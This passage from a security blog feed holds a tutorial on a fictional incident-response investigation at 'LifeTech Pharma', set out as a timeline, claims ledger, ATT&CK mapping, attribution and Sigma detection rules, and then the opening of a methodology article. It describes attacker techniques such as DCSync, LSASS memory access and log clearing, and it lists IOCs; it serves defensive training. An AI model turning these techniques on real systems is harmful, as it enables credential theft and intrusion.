Sysmon EID 10/11/13, EID 4698<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.001, T1547.001, T1053.005, T1197<br><strong>Notes:</strong> svchost32.exe dropped to AppData\\Roaming.</li><li><strong>2024–11–15 20:52 — SERVER-FIN-01<br></strong>WMI lateral movement observed: WmiPrvSE spawned PowerShell with -Enc and a different base64 payload.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.003, T1059.001<br><strong>Notes:</strong> svc_finreport credentials used.</li><li><strong>2024–11–15 21:01 — SERVER-FIN-01<br></strong>Finance data staged: FR_2024_consolidated.zip created in C:\\Windows\\Temp\\.<br><strong>Source:</strong> CrowdStrike EID 11<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039, T1560<br><strong>Notes:</strong> 2.8 MB upload confirmed in firewall logs at 21:14.</li><li><strong>2024–11–15 21:14 — WS-CFO-01<br></strong>wevtutil.exe cl Security executed, partially clearing the Windows Security log.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1070.001<br><strong>Notes:</strong> Sysmon log remained intact because it was protected.</li></ol><p><strong>The evidence label system matters here.</strong> Event 12 (DCSync) is CONFIRMED — it exists in DC01’s Windows Security log, forwarded to Splunk, from an IP that is definitively WS-IT-LEVI and definitively not the pentest VLAN. That cannot be waved away as “possible pentest activity.” Event 6 (finance server access) is CORROBORATED — single source with incomplete log — and can only appear in the technical report with an explicit qualifier, not in the executive brief as a stated fact.</p><h4>3. Save and commit</h4><pre>git add 03-analysis/timeline/timeline.md<br>git commit -m "PROJ-2024-001: timeline — 18 events Oct 18–Nov 15, dual-path confirmed, GAP-001 bounds established"</pre><h3>Step R3: Claims Ledger — Every Assertion Traced to Evidence</h3><h4>1. Open the claims ledger</h4><pre>nano 03-analysis/claims/claims-ledger.md</pre><p>The template has a table with six columns: ID, Claim, Evidence, Confidence, Competing Hypotheses, PIR. Start with an empty row for each major assertion you identified in the timeline — then fill each one completely before moving to the next.</p><p><strong>For each row, answer these five questions before typing a word:</strong></p><ol><li>What is the exact assertion? (One sentence, falsifiable — could in principle be proven false)</li><li>Which file and line number is the evidence in? (Not “we saw in Splunk” — the actual log reference)</li><li>What confidence level and why? (High / Medium / Low / Insufficient — with explicit rationale)</li><li>What alternative explanations were considered — and why were they ruled out or left open?</li><li>Which PIR does this answer?</li></ol><p>If you cannot answer question 4, the claim is not ready to write. Think first.</p><h4>2. Fill in one claim per confirmed technique or PIR answer</h4><p>The claims ledger converts the timeline into auditable, falsifiable assertions. Each claim answers five questions: what, evidence, confidence, competing hypotheses, which PIR.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hBZhaHELHNyuzUeTbMbGvw.png"></figure><p><strong>CL-001 — Initial access via AiTM phishing against IT admin </strong><strong>p.levi</strong></p><ul><li><strong>Claim:</strong> Initial access was via AiTM phishing against IT admin p.levi on October 22, 2024.</li><li><strong>Evidence:</strong> M365 ATP log shows AiTM HTML lure delivered at 11:23 and opened at 11:31. VPN login from Istanbul occurred at 02:17 on October 24 with no MFA challenge, indicating likely stolen session token replay.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Credential purchase or insider activity cannot be fully ruled out without WS-IT-LEVI disk forensics, which is blocked by legal hold. However, the AiTM lure plus token replay pattern is more parsimonious.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-002 — Use of </strong><strong>svc_backup Domain Admin credentials to access formula files</strong></p><ul><li><strong>Claim:</strong> The adversary used svc_backup Domain Admin credentials to access SERVER-RD-02 and the formula files.</li><li><strong>Evidence:</strong> EID 4624 on SERVER-RD-02 shows svc_backup Type 3 logon from WS-IT-LEVI. EID 4663 occurred 47 times on formula files.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate backup operation is ruled out because backup jobs run from SERVER-WSUS-01 / 10.10.4.x, not from WS-IT-LEVI. The timestamp, 02:09 UTC, is outside the maintenance window.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-003 — Exfiltration of 47 formula files on November 6, 2024</strong></p><ul><li><strong>Claim:</strong> The 47 formula files in USPartner2024 were exfiltrated on November 6, 2024.</li><li><strong>Evidence:</strong> EID 4663 occurred 47 times, showing file access. EID 5156 shows outbound HTTPS from SERVER-RD-02 at the same time. Palo Alto NGFW flow shows 10.10.2.15 → 198.51.100.44:443, with 381 MB outbound between 02:14 and 02:19 UTC.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> File access for indexing or backup is ruled out because no backup job ran at this time. The 381 MB outbound volume matches the compressed formula package. The destination IP is not in the allowlist and resolves to a VPS hosting provider.</li><li><strong>PIR:</strong> PIR-001 — <strong>ANSWERED: YES</strong></li></ul><p><strong>CL-004 — DCSync executed via </strong><strong>svc_backup on November 6</strong></p><ul><li><strong>Claim:</strong> DCSync was executed via svc_backup Domain Admin rights on November 6 at 02:48 UTC.</li><li><strong>Evidence:</strong> DC01 EID 4662 shows DS-Replication-Get-Changes GUID from 10.10.3.22, which is WS-IT-LEVI. The subject username was svc_backup.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate AD replication is ruled out because the event originated from a workstation IP, not a domain controller. Authorized pentest scope explicitly excluded DCSync and used only 10.10.99.x IPs.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-005 — CFO path and IT admin path are same threat actor</strong></p><ul><li><strong>Claim:</strong> Path A, involving the CFO on November 15, and Path B, involving the IT admin on October 22, are attributable to the same threat actor.</li><li><strong>Evidence:</strong> Both svchost32.exe and UpdateHelper.dll share the same fake PE compile timestamp: 2018-04-09. The secondary C2 sys-update-cdn[.]net was hard-coded in the CFO implant and also used in SERVER-RD-02 DNS activity.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Coincidence would require two separate actors to target the same organization at the same time using a near-identical toolchain. This is extremely implausible.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-006 — Full domain compromise via DCSync</strong></p><ul><li><strong>Claim:</strong> The adversary achieved full domain compromise via DCSync. All Active Directory credentials must be treated as compromised.</li><li><strong>Evidence:</strong> CL-004 confirms DCSync activity. svc_backup held Domain Admin rights. DCSync requests included krbtgt and privileged account hashes.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> DCSync may have been partial or failed, but this cannot be confirmed without full DC01 log access. Treating the environment as fully compromised is the conservative and operationally correct response until disproven.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-003 is the pivotal claim.</strong> The US partner’s formulas are gone. That drives the PIR-001 answer and the entire notification timeline. CL-004 and CL-006 change the scope of remediation from “contain these three hosts” to “rotate all AD credentials, treat all 80 servers as potentially compromised.”</p><h4>3. Update project.yml PIR status</h4><p>When a PIR is answered, open project.yml and change the status field immediately:</p><pre>nano project.yml</pre><p>Change:</p><pre>- id: PIR-001<br>    status: open</pre><p>To:</p><pre>- id: PIR-001<br>    status: answered    # CL-003 — exfiltration confirmed, 381 MB, Nov 6</pre><h4>4. Commit the claims ledger</h4><pre>git add 03-analysis/claims/claims-ledger.md project.yml<br>git commit -m "PROJ-2024-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003 exfil confirmed); PIR-003 CONFIRMED ONGOING (CL-006 DCSync)"</pre><h3>Step R4: ATT&amp;CK Mapping — Where Detection Failed</h3><h4>1. Open the ATT&amp;CK mapping file</h4><pre>nano 03-analysis/attck-mapping/attck-mapping.md</pre><p>For each technique you identified in the timeline, add one row. The four columns that matter most operationally are: <strong>Confidence</strong> (how sure are you the technique was used), <strong>Rule Fired?</strong> (yes/no/partial — check your SIEM), and <strong>Gap Type</strong> (what kind of work is needed to close this detection hole).</p><p><strong>Gap types:</strong> Rule missing / Data source missing / Coverage incomplete / Architectural gap. Pick one. If you are unsure, write your best guess and flag it for SOC review.</p><p>Also update project.yml — fill the attck_techniques list:</p><pre>nano project.yml</pre><pre>scope:<br>  attck_techniques:<br>    - T1566.001<br>    - T1557<br>    - T1133<br>    - T1078.002<br>    - T1059.001<br>    - T1003.001<br>    - T1003.006<br>    - T1021.003<br>    - T1197<br>    - T1047<br>    - T1070.001<br>    - T1547.001</pre><h4>2. Fill one row per technique</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k61svPS7k5oRag9OCWIk4w.png"></figure><p><strong>T1566.001 — Phishing attachment, CFO </strong><strong>.xlsm</strong></p><ul><li><strong>Evidence:</strong> M365 ATP log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Partial — ATP delivered; SCL=4, threshold=5</li><li><strong>Gap Type:</strong> Coverage incomplete — SCL threshold tuning</li></ul><p><strong>T1557 — AiTM credential theft, IT admin</strong></p><ul><li><strong>Evidence:</strong> VPN login pattern + AiTM HTML lure</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no AiTM session token detection</li></ul><p><strong>T1133 — VPN access with stolen credentials</strong></p><ul><li><strong>Evidence:</strong> VPN log: Istanbul, off-hours, no prior history</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no anomalous VPN authentication alert</li></ul><p><strong>T1078.002 — Valid account abuse, </strong><strong>svc_backup</strong></p><ul><li><strong>Evidence:</strong> EID 4624, multiple events</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — service account off-hours logon undetected</li></ul><p><strong>T1059.001 — Encoded PowerShell, both hosts</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, CrowdStrike</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Yes, CFO only, via CrowdStrike behavioral detection</li><li><strong>Gap Type:</strong> Coverage incomplete — CFO only; IT admin host fired no alert</li></ul><p><strong>T1003.001 — LSASS memory access</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 10, GrantedAccess 0x1010</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — Sysmon EID 10 not alerted on</li></ul><p><strong>T1003.006 — DCSync</strong></p><ul><li><strong>Evidence:</strong> DC01 EID 4662</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — EID 4662 audit configured but no alert rule</li></ul><p><strong>T1021.003 — WMI lateral movement to </strong><strong>SERVER-FIN-01</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike: WmiPrvSE → PowerShell</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — WmiPrvSE parent alert not deployed</li></ul><p><strong>T1197 — BITS download, second stage</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, bitsadmin</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — BITS external download not monitored</li></ul><p><strong>T1047 — WMI execution, lateral movement</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Data source missing — WMI logging not in SIEM</li></ul><p><strong>T1070.001 — Event log cleared</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike EID 1102</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — wevtutil alert not deployed</li></ul><p><strong>T1547.001 — Registry Run Key persistence</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 13</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Coverage incomplete — EID 13 ingested but no alert rule on AppData\\Roaming paths</li></ul><p><strong>The gap taxonomy tells the engineering team exactly what work is required:</strong></p><ul><li><strong>Rule missing (7 techniques):</strong> Data is in SIEM. A detection engineer can write and deploy the rule. These are sprint items.</li><li><strong>Coverage incomplete (3 techniques):</strong> Rule or data exists but is mis-tuned or partial. These require tuning, not new infrastructure.</li><li><strong>Data source missing (1 technique):</strong> WMI execution logging is not in the SIEM. This requires an infrastructure change before rules can be written.</li></ul><p>The DCSync gap (T1003.006) is particularly stark: the Advanced Audit Policy that generates EID 4662 was correctly configured on DC01, the event was forwarded to Splunk, and the event was visible in Splunk. There was no alert rule. A single Splunk search rule on source=WinEventLog:Security EventCode=4662 ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}" from a non-DC IP would have fired and contained this incident before the formula exfiltration.</p><h4>3. Commit the ATT&amp;CK mapping</h4><pre>git add 03-analysis/attck-mapping/attck-mapping.md project.yml<br>git commit -m "PROJ-2024-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 coverage-incomplete, 1 data-source-missing, 1 arch-gap"</pre><h3>Step R5: Attribution Assessment — Same Actor or Two?</h3><h4>1. Open the attribution file</h4><pre>nano 03-analysis/attribution/attribution.md</pre><p>Write attribution <strong>only after the claims ledger is complete</strong>. The attribution file has three sections: evidence for unification (or separation), confidence ladder scoring, and the exact language to use in deliverables. Fill them in that order.</p><p><strong>Do not start with a hypothesis.</strong> Start with the evidence you have from the claims ledger, then see where it points.</p><h4>2. Score the evidence against the confidence ladder</h4><p>The investigation faces a key analytical question: Path A (CFO phishing, November 15) and Path B (IT admin AiTM, October 22) — are they the same actor?</p><p><strong>Evidence for unification (same actor):</strong></p><ol><li><strong>Shared PE compile timestamp:</strong> Both dropped binaries — svchost32.exe (CFO host) and UpdateHelper.dll (IT admin host) — carry an identical fake compile timestamp of 2018-04-09. This is a known toolchain fingerprint. The probability of two unrelated actors both timestomping to the same date is extremely low.</li><li><strong>Shared secondary C2 domain in memory:</strong> Strings extracted from svchost32.exe include sys-update-cdn[.]net — the domain that appeared only in SERVER-RD-02's DNS logs during the formula exfiltration. The CFO's implant knew about infrastructure used during the Path B operation. This is only explicable if the same actor controlled both implants.</li><li><strong>Coordinated operations timeline:</strong> The CFO was targeted on the same day that the finance server data was being staged on SERVER-FIN-01 via lateral movement from the IT admin path. Two independent actors staging finance data simultaneously at the same target is implausible.</li></ol><p><strong>Assessment: Single threat actor, dual delivery mechanism.</strong></p><p>The actor compromised the IT admin first (October 22), used that access for data theft (November 6), then independently targeted the CFO to expand access to finance data. The two phishing lures used different delivery infrastructure (different sender domains, different sending IPs from the same /24 block) — consistent with an actor who maintains parallel operational tracks.</p><p><strong>Attribution confidence: Medium-High.</strong> Apply the confidence ladder from Step R5 of the methodology to score this case:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rrKN1yNFJL_eINzt_iec9A.png"></figure><p><strong>Ladder tier: Medium-High</strong> — TTP overlap + infrastructure match present; independent confirmation absent. The toolset has not been definitively matched to a named cluster, which prevents elevation to High.</p><p><strong>What to write:</strong> <em>“Activity assessed as a single threat actor based on shared toolchain indicators (PE timestamp, secondary C2 domain). Tradecraft and targeting profile are consistent with Iranian-nexus industrial espionage operations targeting Israeli pharmaceutical IP. Attribution to a named cluster is not warranted without CERT-IL deconfliction or independent confirmation. Confidence: Medium-High.”</em></p><h4>3. Paste the final language into attribution.md and commit</h4><pre>git add 03-analysis/attribution/attribution.md<br>git commit -m "PROJ-2024-001: attribution — single actor, Medium-High confidence, shared PE timestamp + secondary C2, Iranian-nexus tradecraft consistent"</pre><h3>Step R6: Detection Rules — Four That Would Have Changed the Outcome</h3><h4>1. Create one file per rule</h4><p>Each rule gets its own file in 04-detections/sigma/:</p><pre>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-001-anomalous-vpn-auth.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-002-dcsync-non-dc.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-003-svc-account-offhours.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-004-wmiprvse-powershell.yml</pre><p>Open the first one:</p><pre>nano 04-detections/sigma/DET-001-anomalous-vpn-auth.yml</pre><p>Every rule must reference the CL-ID it would have detected and the gap type it closes. That is how the detection backlog stays traceable to the investigation.</p><h4>2. Fill each rule</h4><p>Each rule is written with a reference to the claim it would have detected and the evidence gap it closes.</p><p><strong>DET-001: Anomalous VPN Authentication from Non-Corporate Source</strong></p><pre>title: Anomalous VPN Authentication — New Geography or Hosting ASN<br>id: a1b2c3d4-5678-9abc-def0-1234567890ab<br>status: experimental<br>description: &gt;<br>  Detects VPN authentication success from a source IP with no prior history for<br>  this user, specifically from IPs geolocated outside Israel or from hosting/VPN<br>  ASNs. Covers T1133 and T1557 (session token replay after AiTM interception).<br>  Derived from PROJ-001 — CL-001, p.levi VPN from Istanbul at 02:17 UTC.<br>logsource:<br>  category: network<br>  product: cisco_anyconnect<br>detection:<br>  selection:<br>    event.action: vpn_auth_success<br>    user.name|exists: true<br>  filter_known:<br>    source.geo.country_iso_code: 'IL'<br>    source.as.number|not|startswith: ['AS47583', 'AS16276']   # hosting VPS ASNs<br>  condition: selection and not filter_known<br>falsepositives:<br>  - Legitimate international travel — validate against HR travel records<br>  - Remote contractors working abroad<br>level: high<br>tags:<br>  - attack.initial_access<br>  - attack.t1133<br>  - attack.credential_access<br>  - attack.t1557</pre><p><strong>DET-002: DCSync Attack Detection</strong></p><pre>title: DCSync Attack via Non-DC Account<br>id: b2c3d4e5-6789-abcd-ef01-234567890abc<br>status: production<br>description: &gt;<br>  Detects DCSync by looking for EID 4662 with the DS-Replication-Get-Changes<br>  GUID originating from a workstation IP rather than a domain controller.<br>  Derived from PROJ-001 — CL-004: svc_backup performed DCSync from WS-IT-LEVI<br>  using Domain Admin rights that were never revoked after an August 2024 <br>  emergency backup restoration.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4662<br>    ObjectType: '{19195a5b-6da0-11d0-afd3-00c04fd930c9}'   # DS-Replication-Get-Changes<br>    Properties|contains:<br>      - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'             # DS-Replication-Get-Changes-All<br>      - '89e95b76-444d-4c62-991a-0facbeda640c'             # DS-Replication-Get-Changes-In-Filtered-Set<br>  filter_legitimate_dc:<br>    IpAddress|startswith:<br>      - '10.10.1.10'   # DC01 — add all DC IPs here<br>      - '10.10.1.11'   # DC02<br>  condition: selection and not filter_legitimate_dc<br>falsepositives:<br>  - Azure AD Connect sync account — must be explicitly whitelisted<br>  - Authorized red team / pentest — validate scope before dismissing<br>level: critical<br>tags:<br>  - attack.credential_access<br>  - attack.t1003.006</pre><p><strong>DET-003: Service Account Off-Hours Authentication</strong></p><pre>title: Service Account Authentication Outside Business Hours<br>id: c3d4e5f6-789a-bcde-f012-34567890abcd<br>status: experimental<br>description: &gt;<br>  Detects authentication by a service account (accounts matching svc_* naming<br>  pattern) outside business hours (22:00–06:00) to a non-designated system.<br>  Covers T1078.002 (Valid Accounts: Domain Accounts) for svc_backup lateral<br>  movement in PROJ-001.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4624<br>    LogonType: 3<br>    SubjectUserName|startswith: 'svc_'<br>  filter_business_hours:<br>    TimeCreated|windash|lt: '22:00:00'<br>    TimeCreated|windash|gt: '06:00:00'<br>  filter_known_backup_host:<br>    IpAddress: '10.10.4.15'   # SERVER-WSUS-01 — legitimate backup source<br>  condition: selection and not filter_business_hours and not filter_known_backup_host<br>falsepositives:<br>  - Scheduled tasks that legitimately run at night — review and whitelist specific pairs<br>level: medium<br>tags:<br>  - attack.lateral_movement<br>  - attack.t1078.002</pre><p><strong>DET-004: WmiPrvSE Spawning PowerShell</strong></p><pre>title: WMI Remote Execution — PowerShell Child of WmiPrvSE<br>id: d4e5f6a7-89ab-cdef-0123-4567890abcde<br>status: production<br>description: &gt;<br>  Detects WMI-based lateral movement (T1021.003) where WmiPrvSE.exe spawns<br>  PowerShell on a remote system. This is the pattern from PROJ-001 step 16:<br>  lateral movement from WS-CFO-01 to SERVER-FIN-01 via WMI using svc_finreport<br>  credentials. CrowdStrike detected the PowerShell on SERVER-FIN-01 but the<br>  originating WMI connection from the CFO host had no coverage.<br>logsource:<br>  category: process_creation<br>  product: windows<br>detection:<br>  selection:<br>    ParentImage|endswith: '\WmiPrvSE.exe'<br>    Image|endswith: '\powershell.exe'<br>  suspicious_flags:<br>    CommandLine|contains:<br>      - '-Enc'<br>      - '-EncodedCommand'<br>      - '-NonI'<br>      - '-W Hidden'<br>  condition: selection and suspicious_flags<br>falsepositives:<br>  - SCCM WMI-based software deployment with PowerShell post-install scripts<br>level: high<br>tags:<br>  - attack.lateral_movement<br>  - attack.execution<br>  - attack.t1021.003<br>  - attack.t1059.001</pre><p><strong>Validation:</strong> All four rules were validated against the PROJ-001 evidence set using Hayabusa before deployment. DET-001 fires on the October 24 Istanbul VPN login. DET-002 fires on the November 6 DCSync event. DET-003 fires on every svc_backup off-hours logon. DET-004 fires on the SERVER-FIN-01 WMI execution.</p><h4>3. Validate each rule against your evidence set</h4><pre># Run Hayabusa against the collected logs to confirm rules fire on known-bad events<br>hayabusa csv-timeline -d 01-evidence/ -r 04-detections/sigma/ -o validation-results.csv</pre><p>Review the output. A rule that does not fire on its own evidence set should not be deployed.</p><h4>4. Update project.yml deliverables count and commit</h4><pre>nano project.yml</pre><pre>deliverables:<br>  - type: sigma-rules<br>    count: 4<br>    status: complete</pre><pre>git add 04-detections/sigma/ project.yml<br>git commit -m "PROJ-2024-001: detections — DET-001 to DET-004 written and validated PASS against evidence set via Hayabusa"</pre><h3>Step R7: Deliverables — What Each Stakeholder Gets</h3><h4>1. Open the deliverable templates</h4><pre>nano 05-deliverables/executive-brief.md<br>nano 05-deliverables/soc-handoff.md</pre><p>The executive brief answers three questions only: what happened, what was confirmed stolen or compromised, and what must happen in the next 24 hours. One page. No technical jargon. Every PIR that is answered gets a one-line answer at the top.</p><p>The SOC handoff lists: current IOCs (with confidence ratings), detection rules deployed, hunting queries still open, and escalation criteria. The SOC receives this, not the executive brief.</p><blockquote>2. Fill the executive brief</blockquote><p><strong>Executive brief (1 page, TLP:AMBER) — what the CISO needs in 90 minutes:</strong></p><blockquote><em>An adversary assessed as Iranian-nexus compromised LifeTech Pharma through two separate phishing attacks over 24 days. Using stolen IT administrator credentials, they accessed and exfiltrated the 47-file US licensing formula package on November 6, 2024. They also performed a DCSync attack on the domain controller, which means all Active Directory credentials must be treated as compromised.</em></blockquote><blockquote><strong><em>PIR-001 ANSWERED:</em></strong><em> The US partner formula package was exfiltrated. 381 MB outbound confirmed in firewall logs.</em></blockquote><blockquote><strong><em>PIR-003 ANSWERED:</em></strong><em> Active compromise ongoing. The CFO alert on November 15 is a second wave from the same actor, still active at time of investigation.</em></blockquote><blockquote><strong><em>Immediate actions:</em></strong><em> Full AD credential rotation; quarantine WS-CFO-01 and SERVER-FIN-01; notify INCD (72h clock from discovery: expires November 17 02:14 IST); brief the US licensing partner.</em></blockquote><p><strong>SOC handoff (technical):</strong></p><p>Current IOCs: 203.0.113.87, 198.51.100.44, telemetry-cdn-services[.]biz, sys-update-cdn[.]net, uslifepartner-group[.]com, lifetechpharma-corp[.]eu.</p><p>Four detection rules deployed (DET-001 through DET-004). Two hunting queries: (1) pivot on C2 domains across all 838 endpoints — the 3 confirmed hosts may not be all; (2) hunt for any svc_backup authentication from non-WSUS IPs in the past 30 days.</p><h4>3. Update project.yml status to closed and commit everything</h4><pre>nano project.yml</pre><pre>project:<br>  status: closed<br>pirs:<br>  - id: PIR-001<br>    status: answered    # CL-003<br>  - id: PIR-002<br>    status: answered    # CL-001<br>  - id: PIR-003<br>    status: answered    # CL-006 - ongoing, AD rotation required</pre><pre>git add 05-deliverables/ project.yml<br>git commit -m "PROJ-2024-001: deliverables — executive brief, SOC handoff, INCD notification ready; all PIRs answered; project closed"</pre><h3>The Git History: What a Completed Investigation Looks Like</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9m5xzm1v4yUoNN47GznubQ.png"></figure><pre>b9a2f1c  PROJ-001: deliverables — executive brief, SOC handoff, INCD notification ready<br>7c8d3e4  PROJ-001: detections — DET-001 through DET-004 validated PASS via Hayabusa<br>5f2a9b1  PROJ-001: attribution — single actor assessed (shared PE timestamp + secondary C2)<br>3e4c7d8  PROJ-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 incomplete, 1 data-missing<br>1b6f2a5  PROJ-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003); PIR-003 CONFIRMED ONGOING (CL-006)<br>9a3e7c2  PROJ-001: timeline — 18 events Oct 22–Nov 15; dual-path confirmed, same actor assessed<br>6f1b4d9  PROJ-001: evidence inventory — 6 sources, GAP-001 documented, firewall log retrieval urgent<br>2c8a5e3  PROJ-001: scope — signed off 22:55 IST; PIR-001/002/003, TLP AMBER, legal hold WS-IT-LEVI<br>a1d7f4b  PROJ-001: intake — CFO PowerShell alert, legal hold WS-IT-LEVI, formula data in scope<br>0e9c2b7  PROJ-001: scaffold initialized</pre><p>Each commit is a phase. Each message states the project ID, the phase, and a one-line summary of what was concluded. When a lawyer asks six months from now “what did you know and when did you know it?” — the git log answers.</p><h3>Key Lessons</h3><p><strong>The alert was not the beginning.</strong> The SOC received its first signal 52 hours after the breach was already in progress — and 15 days after the formula files were gone. The triggering alert was the second entry point. A detection rule on anomalous VPN authentication (DET-001) would have fired on October 24 at 02:17 UTC — before any lateral movement, before any data access.</p><p><strong>Gaps are findings, not absences.</strong> The 10-day Sysmon gap on WS-IT-LEVI coincided exactly with the delivery of a phishing email. Stopping a logging service is T1562.001 — Impair Defenses. A gap is not “we don’t know what happened.” A gap that coincides with a malicious delivery is evidence of anti-forensics.</p><p><strong>DCSync changes everything.</strong> The scope of remediation is not “three infected hosts.” When DCSync is confirmed via Domain Admin rights, every credential in the AD is potentially compromised. The scope is all 80 servers. The IR Lead needs to know this before the 90-minute CISO brief, not after.</p><p><strong>Claims need competing hypotheses.</strong> CL-003 (exfiltration confirmed) is only defensible as “high confidence” because specific alternative explanations were checked and explicitly ruled out — scheduled backup (wrong source IP, wrong timing), authorized developer activity (no jobs scheduled). Without the competing hypothesis analysis, a claim is an assertion. With it, it is analysis.</p><p><em>This scenario is training assignment A01 from the </em><a href="https://github.com/anpa1200/CTI_as_a_Code"><em>CTI as a Code repository</em></a><em>. The full evidence set, template, and worked solution are available there.</em></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3e6574b7b85f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f">CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CTI as a Code: Complete Step-by-Step Methodology]]></title>
<description><![CDATA[Version-controlled threat intelligence — from first call to deployed Sigma rule.Why This Methodology ExistsMost CTI work degrades in three predictable ways:The evidence problem. An analyst writes “the adversary used T1078” in a report. Six months later nobody can answer: what log line supports th...]]></description>
<link>https://tsecurity.de/de/3580442/hacking/cti-as-a-code-complete-step-by-step-methodology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580442/hacking/cti-as-a-code-complete-step-by-step-methodology/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>Version-controlled threat intelligence — from first call to deployed Sigma rule.</strong></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ygo9Os6SaZrumCm_Y08aKA.png"></figure><h3>Why This Methodology Exists</h3><p>Most CTI work degrades in three predictable ways:</p><p><strong>The evidence problem.</strong> An analyst writes “the adversary used T1078” in a report. Six months later nobody can answer: what log line supports that claim? Was it confirmed or inferred? What alternative hypotheses were ruled out? The claim exists in a PDF but the reasoning is gone.</p><p><strong>The detection problem.</strong> A detection rule gets written after an incident. It sits in the SIEM with no documentation of which adversary technique it covers, which evidence motivated it, or whether it was ever validated. When the technique evolves, nobody knows which rules to update.</p><p><strong>The institutional knowledge problem.</strong> The analyst who ran the investigation leaves. The entire understanding of what happened, how it was analyzed, and what was decided goes with them. The next incident starts from zero.</p><p>CTI as a Code solves all three. Every claim traces to evidence. Every detection traces to a technique. Every decision is a git commit. The investigation is reproducible by anyone with access to the repository.</p><h3>Contents</h3><ul><li><a 